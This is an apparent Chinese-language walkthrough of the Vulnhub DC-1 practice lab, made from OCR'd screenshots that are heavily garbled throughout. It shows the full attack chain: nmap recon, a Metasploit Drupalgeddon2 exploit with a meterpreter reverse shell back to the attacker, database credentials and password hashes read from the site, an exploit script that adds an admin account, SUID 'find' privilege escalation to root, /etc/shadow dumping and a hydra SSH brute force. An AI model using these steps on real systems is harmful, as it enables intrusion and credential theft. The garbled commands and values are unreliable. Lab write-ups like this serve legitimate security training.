Vulnhub-DC:1
靶机地址:https://www.vulnhub.com/entry/dc-1-1,292/
大家好,我们是想要为亿人提供安全的亿人安全,这是我们自己想要做的事情,也是做这个公众号的初衷。希望以干货的方式,让大家多多了解这个行业,从中学到对自己有用的芝士~
扫描局域网收集目标IP
-(rootokali)-[~]
-#arp-scan-1
EN10MBMA8
Interface:ethotype:En
256hosts(https://github.com/royhill/arp-scan)
startingarp-scan1.9.7wi
.7with256
VMwareInc
192.168.86.1
QQ:50:56:c0:00:08
VMware,
QQ:50:56eb:cf:2c
Inc.
192.168.86.2
192.168.86.139
VMware
QQ:QC:29:57:90:78
Inc,
192.168.86.254
VMware
QQ:50:5618:17:1c
Inc.
4packetsreceivedbyfilteackepd
(131.82hosts/sec).
Endingarp-scan1.9.7:256hostsscanned
1.942
seconds(
in
responded
扫描主机
-(rootokali)-[~]
#nmap-sV-p192.168.86.139
startingNmap7.91(http:/mapogt1
A
Nmapscanreportfor192168.863(192168.813
Hostisup(00Q13slatency)
Notshown:65531closeports
STATESERVICEVERSION
PORT
2.0)
OpenssH6.op1Debian4+deb7u7
22/tcp
ssh
protoco1
open
Apachehttpd2.2.22(Debian))
http
80tcp
open
rpcbind2-4(RPC#100000)
111/tcp
open
staTuS1(RPC#100024)
34068/tcpopen
MACAddress:qQ:qc:29:57:9D:78(VMware)
OFFENSIVE
SerViceInfo:Os:Linux;CPE:cpe:/o:linuxluxe
Servicedetectionperformned.Pleasereportanyincorrectresultsathtt:/
map.org/submit/
Nmapdone:lIPaddress(1hostup)s
Pscannedin13.52seconds
访问网页
192.168.86.139
印
你
KaliTraining
GHDB
KaliTools
NetHunterOffensiveSecurityMSFU
Exploit-DB
kaliDocs
kaliForums
Wappalyzer
DrupalSite
CMS
Operatingsystems
Deblan
Drupal
Home
Webservers
JavaScriptlibraries
Userlogin
jQuery1.4.4
Apache2.2.22
WelcometoDrupalSite
NofrontpagecontenthasbeencrealedyeL
Programminglanguages
PHP5445
Ohp
Password*
Createnewaccount
Enrichyourdatawithtechstacks
Requestnewpassword
竖UploadalIstofweLTogetAporoftheTechoLogLeSIin
use,suchascMsorecommerceplatforms
Login
Uploadallst
使用msf进行漏洞查找攻击
kali)-[~]
rooto
msfconsole
IIIIII
dTB.dTb
VB
HHHH
BometoDrupalSite
pagecontenthasbeencreatedyet
IIIIII
YVP
Iloveshells--egypt
ZRRR
metaspLoity6.0.30-de
2099exploits1129auxiliary-357post
45encoders-10nops
592payloads
7evasion
Metasploittip:Youcanusehelptoviewall
avaitablecommands
漏洞搜索
drupal
isf6
search
MatchingModules
DisclosureDate
Name
Rank
Check
Description
WelcometoDruDalSite
Qauxiliary/gather/drupal_openid_xe
2012-10-17
normal
DrupalopenIDExternalEntityInjection
Yes
1
auxiliary/scanner/http/drupaliewse
2010-07-02
normal
DrupalviewsModuleUsersEnumeration
Yes
exceLLe
2exploit/multi/http/drupaldrugon
2014-10-15
HTTPParameterKeyValuesoLInjection
No
Drupa
Nt
excelLe
2016-07-13
3exploit/unix/webapp/drupacodrex
CODERMoDuLeRemoteCommandExecution
NTYes
Drupa
excelLe
2018-03-28
4exploit/unix/webapp/drup
rupaldrupalgeddon2
Drupa
DrupaL
NtYes
LgeddonFormsAPIPropertyInjection
excelLe
2016-07-13
loit/unix/webapp/drupa
restwsexec
5
exPlo]
NtYes
RemotePHPCodEExECuTiON
RESTWSModule
Drupa
6exploit/unix/webapp/drupalestwu
normal
Yes
RESTfuLWebServicesunserializeORCE
Drupa
2005-06-29
exploit/unix/webapp/php_xmlrcea
7
excelLe
PHPX
PXML-RPCArbitraryCodeExecution
NtYes
Interactwithamodulebymorindex.Forexamleinfo7uee
loit/unix/webapp/phpxmlrpcea
使用漏洞攻击方法,可以按顺序进行攻击,查看参数选项show options
msf6>useexploit/unix/webapp/drupaldruplgeddon
[*N
NopayLoadconFigureDuigp/PTevEP
msf6exploit(unix/webapp/drupal_drupalgeddon2)
showoptions
ModuLeoption(exploit/unixw
Description
CurrentSettingRequired
Name
false
Dumppayloadcommand
DUMPOUTPUT
doutput
no
PHPfunctiontoexecute
PHPFUNC
yes
passthru
Aproxychainofformattype:host:
Proxies
no
port[,typ:hostportjt...]
Thetargethost(s)rangeCIDRide
RHOSTS
yes
ntifierorhostsfilewith
Syntax'file:spath>
Nottontpag
Thetargetport(TCP)
80
RPORT
yes
SSL
NegotiatessL/TLsforoutgoingcon
false
no
nections
TARGETURI
PathtoDrupalinstall
yes
HTTPserVerVirtualhost
VHOST
no
hhpatemewaocoumt
Payloadoptions(php/meterpreter/reverse_tc):
Reguesinewpassword
CurrentSettingRequired
Description
Name
Thelistenaddress(aninterfacemaybe
192.168.86.138
LHOST
yes
specifieD
Thelistenport
4444
LPORT
yes
Exploittarget:
Name
Id
Automatic(PHPIn-Memory)
O
设置攻击域名,开始攻击
msf6exploit(unixwepP/drupal.druplgeddom)set
rhosts192.168.86139
ontpagecontenthasbeencreatedyet
msf6exploit(unix/webapp/drupaldupalgeddon2)>explot
[*startedreverseTcPhandleron192168.863444
ExecutingautoMaticcheckdiabeAutocheckooverrid)
Theserviceisrunning,butcouldnotbelidat
sendingstage(39282bytes)t192168.86139
[*
Meterpretersession1pned9
at2021-06-0816:03:15+0800
攻击成功
192.168.86.139:48889
Meterpretersessionlopend(1921688613444
at2021-06-0816:03:15+0800
meterpreter
进入shell环境,ls查看当前目录下文件
meterpreter>shell
Process3465created.
ChanneLOcreated.
ls
COPYRIGHT
WelcometoDrupalSite
INSTALL.MVSqL.
INSTALL.gsql.t
INSTALL.Sqlite.txt
Notontpagecontenthasbeencreatedyet
INSTALL.
LICENSETXt
MAINTAINERS.xt
READMEtxt
UPGRADE.txt
authorize.php
ptpatpaawaaoaoumi
cron.php
fLag1.txt
Reauestnewipassword
incLudes
index.php
install.php
LoO1
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
查看flag1.txt
catflag1.txt
EverygoodcMsneedsaconfigfile-andsodoyou
查找配置文件
cd
sites
Password
ls
README.txt
a11
default
ataount
example.sites.php
cdLdefault
Notiontpagecontenthasbeencreatedyet
1s
default.settings.php
files
settings.php
settings.php
cat
<?php
DrupalSite
**
flag2
Bruteforceanddictionryttacksarente
(andyouWILLneedaccess).
onlywaystogainaccess(andyo
Whatcanyoudowiththese
credentials?
$databasesarray
WelcometoDrupalSite
default
一
array(
wsermame
default9
Notiontpagecontenthasbeencreatedyet
array(
'drupaldb
一
database
一>
dbuser
username
ROCK3t
一
password
Localthost
host
一
一
port
mysql'
driver
pref
SswO1d
Lo0m
**
forupdate.phpscript.
ACcess
control
Ifyouareupdating
yourDrupalinstallationuinghdateppcitu
e"Administersoftware
arenotloggedinusingeitheranaccountwiththe"dm
thesitemaintenanceaccount(theaccounthata
permissionorthe
updates
dduringinstallationicc
createddu
statementbelowChanetheFALSEtoTRuEtodiletheaccesheck
Atterfinishingtheupgrade,besuretoopenthileainanchanethe
TRUEBackToaFALSE!
退回shell界面,使用python pty模块,链接数据库
"importptyipty.spawn("/bin/sh")
Python-c
$mysql-udbuser-P
hhnaaaoum
mysql-udbuser-p
EnterPassword:Rock3t
WOn0
查看数据库
showdatabases;
mysql>
showdatabases;
Database
information_schema
unt
drupaldb
woRO
inset(O.oOsec)
rows
mysql>usedrupaldb
usedrupaldb
Readingtableinformationforcompletionoftableandcolumnames
of
Leandcc
featuretogeta
Youcanturnoffthisfe
quickerstartupwith-A
Databasechanged
showtables;
192.168.86.139
mysg
showtables;
+LiTooLsKaliForums
Offensive
KalDocs
SNetHunter
Tables_in-drupaldb
actions
DrupalSite
authmap
batch
block
blockcustom
blocknode-type
blockrole
Home
blocked_ips
cache
cache_block
cache_bootstrap
Userlogin
Welcometo
cachefield
cachefilter
usermame
cacheform
Notrontpagecontenth
cache_image
cache_menu
cache_page
Password
cache_path
cache_update
cacheViews
cacheviewsdata
oCteatenewaccount
comment
Reguestnewpassword
ctools.csscache
ctoolsobjectcache
dateformatlocale
Login
dateformat_type
dateformats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_datafield_image
field-data_field_tags
fieldrevision_body
field_revision-comment_body
field_revision_field_image
fielDrevision_field_tags
file
e._managed
Poweredbyorupal
fileusage
filter
filterformat
查询所有用户
fromusers;
mysql>
SeLect
useRs;
from
login
uid
Format
thene
signature
status
tiMezone
signature
name
pass
init
data
picture
O
0
NULL
NULL
0
NULL
0
1550581826
NULL
SSQGYGOOINOXRIEMFIYGFNUJCEDTCP9NS5BEKUDR
Australia/Melbour
1550583852
admin
admingexanpLe.com
1550582362
oadmindexample.comb:o;
ne
1550581952
SSDWGXEF6DOCWBTSGLHRRW1R3QBWCOEKVBO/OTCGG
fiLtErEDHTML
82225
1550582225
Frod
frodaexample.org
Australia/MeIbour
OLfrednexample.orgIb:o;
ne
(0.00Sec)
ROWsinSET
使用exploitdb攻击脚本,增加一个权限账号
(rootokali)
OA192FLEACtionsEditView
searChsploitdrupl
ewHeip
CPOnS5:138MEKUDR
adminsssDy016
adminoexample.con
Path
EXPLOitTitle
Kallthaning
1Australia/Me
550582362
NI
oadmi
php/webapps/21863.txt
4-NewsMessageHTMLInjection
Drupa
SSSDMGRX
ftedbexample.org
php/webapps/22940.txtH2SIR3oBcoEkvBo/9tcog
fred
-Cross-sitescripting
4.1/4.2-
Drupal
php/webapps/1088.pl50582225
1550582225
iiteredhtm
Australia/i
:4.6.1-CommentsPHPInjection
4.5.3
Drupa
fred
AttachmentmodmimeRemotecommandExecution
php/webapps/1821.php
Drupa
4.7-
php/webapps/27020.tt
URL-EncoDEDInPUTHTMLINjection
Drupa
4.X
5.2
php/webapps/4510.txt
PHPZENDHASHATiONVecTOr
Drupat
Drupal5.21/6.16-DenialofService
php/dos/10826.sh
ScriptingVulnerabilit
Drupal
php/webapps/11060.txt
6.15-MultiplePersistentCross-SiteS
7.0<7.31
don'SQLInjection(
Drupal
(AddAdminUser)
Drupalgeddon
php/webapps/34992.Py
7.0<7.31
php/webapps/44355.Php
(AdminSession
DrupalgeddonsoLInjection(Adm
Drupal
7.0<7.31
php/webapps/34984.Py
Passw
DrupaigeddonSoLInjection(Poo)(Resetp
Drupal
7.0<7.31
DrupaigeddonsQLInjection(Poc)(Reset
php/webapps/34993.php
Drupal
Passw
70<7.31
iigeddonsQLInjection(RemoteCode
php/webapps/35150.php
Drupat
Drupalg
ExeCU
7.12-MultipleV
LeVuLnerabilities
Drupal
php/webapps/18564Txt
mai
name
pass
7.XModuleServices-RemoteCodeExecution
php/webapps/41564.php
Drupat
timezone
status
onsismaturefo
php/webapps/3313.l
<4.7.6-PostcommentsRemoteCommandExecution
Drupat
init
BvoRMTionDiGture
5.1-PostCommentsRemoteCommandExecution
php/webapps/3312.p1
Drupal
<5.22/6.16-MultipleVulnerabilities
php/webapps/33706.txt
Drupat
php/dos/35415.TXt
-Denialofservice
<7.34-
Drupal
Drupalgeddon3(Authenticated)RemoteCode(Metasp
<7.58
php/webapps/44557.rb
Drupal
7.58
(AuthenTicateRemoteCodeExecuti
Drupalgeddon3Au
Drupal
php/webapps/44542.Txt
NULL
<8.3.9/<8.4.6/<8.5.1
<7.58/<8
Drupalgeddon2Remot
Drupal
php/webapps/44449.rb
<8.3.9/<8.4.6/<8.5.1-
REMOteCodDeEX
php/remote/44482.rb
Drupal
Drupalgeddon2"'Re
php/webapps/44448.PyCEDToP9nS5.138EKUDR
adminoexample.com
DRupaLgedDon2REMOTeCOdEEx
<8.3.9/<8.4.6/<8.5.1
Drupal
50583852
1550582362
1:Australia/Me
8.5.11/<8.6.10STFulWebservicesuserializRm
php/remote/46510.rb
Drupal
8.6.10/<8.5.11RESTMOdULERmOTECODEExEcuTION
pho/webapps/46452.Txt
Drupal
RMHZSIR3OBWCOEKVBO/9TCGO
fredbexample.org
edsssongrx
<8.6.9RESTModULEREMOTECODEEXEcUTION
php/webapps/46459.Py
Drupal
Australia/Me
1550582225
582225
php/webapps/44501.Txt
ArbitraryFileDisclosure
Drupalavatar_uploaderv7.x-1.0-beta8
php/webapps/32415.T
DrupaiModuleAjaxchecklist5.x-1.0
MultiplesolInjections
5501096
php/webapps/35335.tmlResktxSHGTebcsioLh
DrupalModuleCAPTCHA-SecurityBypass
NULL
DrupalModuleCKEditor3.0<3.6.2
EventHandlerCross-
Persistent
php/webapps/18389.txt
G(Drupal6.x/7xPersistentc
DrupalModuleCKEditor4.1WYSIWYG(D
x
x
php/webapps/25493.Tt
DrupalModuLeCODER2.5-RemoteCommandEX
MetaspLoit
DExeCuTiON
php/webapps/40149.rb
ModuleCoder<7.X-1.3/7X-2.6
Drupal
RemoteCodeExecution
php/remote/40144.php
'tagcLoudCross-sitescrip
DrupalModuleCumulus5.x-1.1/6.x-1.4
php/webapps/35397txt
DrupaiModuLeDragDropGallery6X-1.5u
-'upload.phpArbitrary
php/webapps/37453.php
DRUPalModuleEmbeddedMediaFiedMdiaxaM
php/webapps/35072.txt
MODULERESTWS7XPHPRMOTECODEEXecUtIONMetasPLOIT)
php/remote/40130.rb
Drupal
ModuleSections-cross-sitescripting
Drupal
php/webapps/10485txt
ModuleSections5X-1.2/6X-1.2Ijtion
Drupal
php/webapps/33410Txt
SHeILcODES:NOResults
(rootokali)-[~
php/webapps/34992.-thtp:/
usr/share/exploitdb/explo/
Python
9NS5:138MEKUDR
adminge
INEXRLEEMF94Y6FVN8NUIJCEDTCP9N
Kawiraining
Kaucinux
1550581826
1550582362
1550583852
dmindexample.com
B:0
I
MLWi5chRRMH2S1R3OBWCOEKVBO/9TCGO
Grxef6.D0cWB5TS.GLnLm15c
1550582225
1550581952
1550582225
htmt
redbexample.org
6:0
刮真开手行
TS
mai
Drup4170<7.31sql-1nj3ct1on
Login
access
Status
phmatcmeateo
Admin4ccountcr3ator
data
Discoveredby:
STeFanHorst
(CVE-2014-3704)
NUL
NULI
Writtenby:
admin
SSSDVOIOY00INEXRIEEME94Y6FyNSNUSCEDTCP9nS5.138TDEKODR
adminoe
1550583852
1550582362
1550581826
CLaudioViviani
admingexample.com
B:0:
21
SSSDWGPXEfS.DOCWBSTS.GLnLwischRRwzsiR3oBwcoEkyo/9fccg
Fred
frednex
http://www.homelab.it
fitteredhtmt
1550582225
1550581952
1550582225
frednexample.org
B:0:
infoahomeLab.it
SSSCTO9G7LXD7VAANBMGTODOWXMOiNDCResHKGtxasHowTebcs1oLh
homeLabitaprotonmail.ch
NULL
https://wwww.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+Homelabit1/
https://ww.youtube.com/channel/ucqamsdMqfexicceDLww
roMS-insetRo.oosec
mysgto
[!]VULNERABLE!
poweteobtoruoa
[!]Administratorusercreated!
login:kali
Pass:123
url:htt://192.168.863iti
查看数据库,成功
mysql>select*fromusers;
select*fromusers;
uid
theme
name
sbeenC
pass
login
timezone
status
signature
signature
ormat
created
access
picture
data
init
anguage
山民1
口
NULL
NULL
?
NULL
?
SDQI6YINEXRIEEM94Y6FYN8UJCEDTP9NS538EKUDR
admin
adminexample.com
1
1550582362
1550583852
1550581826
NULL
Australia/Metbourne
admingexample.com
OLa
b:0;1
2
SSDWGXEFBDOWBSTSGLLWCHRRW1RBWCEKBO/9TCGG
Fred
fredaexample.org
Filteredhtml
1/Australia/Melbourne
1550582225
1550582225
1550581952
fredaexample.orgb:o;
0
lkali
一
SSCTO9GLX2DVAANSMGTDAWXNGINDCRESEKGTXASHGWTBC5IOLH
1
NULL
NULL
?
?
?
NULL
rowsinset(0.oosec)
登陆网站
DrupalSite
Home
Userlogin
WelcometoDrupalSite
Username
Nofrontpagecontenthasbeencreatedyel
kali
Password
.odI
Createnewaccount
Login
点击Content
Help
Content
People
Structure
Contlquration
Reports
Modules
Dashboard
Appearance
ADDCONTENT
FIndcontent
Logout
Myaccount
DrupalSite
Home
WelcometoDrupalSite
Nofrontpagecontenthasbeencreatedyel
Navigation
Addnewcontent
?Addcontent
找到flag3
Modules
Help
HelloKa
HomepAdminbstraLlon
地心如
Addcontent
SHOWONLYITEMSWHERE
status
FiIlter
any
type
any
UPDATEOPTIONS
Publishselectedcontent
Update
TITLE
OPERATIONS
TYPE
AUTHOR
STATUS
UPDATED
0220/2019-00:44
cditdelete
tIag3
Basicpage
Basicpaqe
02/20/2019-00:17
editdelete
Frod
My
Logout
account
DrupalSite
Home
Home
flag3
Edit
View
Navigation
SREAPERMSWIAPHNDIPWYmK
Addcontent
intheshadow.
先查看一下具有suid权限位的文件
$find/-typef-perm-u-s2>/dev/null
find/-type
f-perm-u-s2>/dev/null
/bin/mount
/bin/ping
/bin/su
bin/ping6
bin/umount
usr/bin/at
usr/bin/chsh
usr/bin/passwd
usr/bin/mnewgrp
usr/bin/chfn
usr/bin/gpasswd
usr/bin/procmail
usr/bin/find
usr/sbin/exim4
usr/lib/pt.chown
usr/ib/openssh/ssh-keysign
usr/lib/eject/dmcrypt-get-device
usr/ib/dbus-1.dbus-daemon-taunch-helper
sbin/mount.nfs
利用find提权
acce-exec/bin/sh'
find
find
/bin/sh
acce
exeC
#Whoami
whoami
root
#
查看shadow文件,发现flag4
#
TVetc/shadow
cat
cat
etc/shadow
3HFUSWMtwHABO*M
root:6$rhe3rF
/:17955:0:99999:788
17946:0:99999:7
daemon:*:1
bin:*:17946:0:99999:78
17946:0:99999:7
Sys:
syNc:*:17946:0:99999:7
games:*:17946:0:99999:7
man:*:17946:0:99999:788
Lp:*:17946:0:99999:7:
mail:*:17946:0:99999:7
news:*:17946:0:99999:7
UuCP:*:17946:0:99999:7
Proxy:*:17946:0:99999:7
wW-datA:*:17946:0:99999:788
backup:*:17946:0:99999:78
list:*:17946:0:99999:78
irc:*:17946:0:99999:7
gnats:*:17946:0:99999:7
nobody:*:17946:0:99999:7
libuuid:!:17946:0:99999:788
Debian-exim;!:17946:
6:0:99999:788:
statd:*:17946:0:99999:788
messagebus:*:17946:0:99999:7
sshd:*:17946:0:99999:7:
mysql::17946:0:99999:788
3d363.
80:17946:0:99999:7
使用hydra+John密码包对flag4的密码进行爆破
hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.220.130 -f -vV -o hydraflag4.ssh
in"flag4
(0/2)
3561[child14]
scooter
target192.168.86139gi
150
ATTEMPT]
pass
login"flag4"
61[child15](0/2)
pass"shalom
1510f3561
[ATTEMPT]
target192.168.86139
login:flag4
[22][ssh]
host:192.168.86.139
password:orange
[STATUS]attackfinishedfor192.168.86139
found
pairf
valid
found
lof1targetsuccessfullycompletediaw
finishedt2021-06-082018:34
Hydra(https://github.com/vanhauser-thc/thc-hdra)
使用flag4用户可以通过ssh登录系统
-(rootokali)-[~]
#sshflag40192168.86139
lag40192168.86139password:
flag
LinuxDC-13.2.0-6-486#Debian32121
Thepi
PrograMSinctuddwiththeiane
theexactdistributiontermsrchehe
individualfilein/u/hr/d/coyrg
进入flag4目录/home/flag4,找到flag4.txt文本文件,找到flag4
flag4aDc-1:~$cd/home
flag4aDC-1:/home$ls
flag4
flag4aDC-1:/homescdflag4
flag4aDC-1:~$ls
flag4.txt
flag4aDc-1:~$catflag4.txt
findoraccesstheflag
in
hodto
root?
Canyouusethissamemethod
ProbablyButperhapsit'otht
获取root权限,进入到/root下找到thefinalflag.txt,完成
flag4aDC-
mkdirabc
flag4@DC-1:~
findabc-exec/bin/sh';
#cdroot
#1s
thefinalflagtt
#catthefinalflag.txt
We1Ldone!!!!
HopefuLlyyouveenjoyedthisandlearnedsomenewskill
YouCANLetmknowwhatyouthoughtofthisu
bycontactingmeiaTwitteAu7
